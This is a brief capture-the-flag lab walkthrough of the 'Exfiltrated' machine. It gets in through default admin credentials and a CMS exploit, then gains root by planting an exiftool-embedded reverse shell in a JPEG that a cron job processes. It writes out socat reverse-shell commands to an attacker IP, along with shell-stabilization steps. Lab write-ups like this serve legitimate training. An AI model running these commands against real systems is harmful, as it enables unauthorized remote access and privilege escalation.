🐧Exfiltrated

IP: 192.168.116.163

Nmap scan

nmap -sV -p- 192.168.116.163 -A

Had to add 192.168.116.163 exfitrated.offsec to /etc/hosts

Dirbuster scan

Robots.txt

Found at /panel/

Admin:Admin allows me to log in here.

Found this CMS has known exploits.

Getting a normal shell.

socat TCP:192.168.49.116:5555 EXEC:bash

Stabilized shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

Ctrl + Z

stty raw -echo; fg

stty rows 38 columns 116

Dropped and ran Linpeas on machine. Found interesting cron job.

After about an hour I had to get a hint here. I could not figure out how to get the exif data into a jpg.

https://github.com/OneSecCyber/JPEG_RCE Was able to add reverse shell to the jpg file.

exiftool -config eval.config runme.jpg -eval='system("socat TCP:192.168.49.116:5556 EXEC:bash")'

Re-uploaded through admin panel.

And a minute later when the cron job ran.

Last updated 3 years ago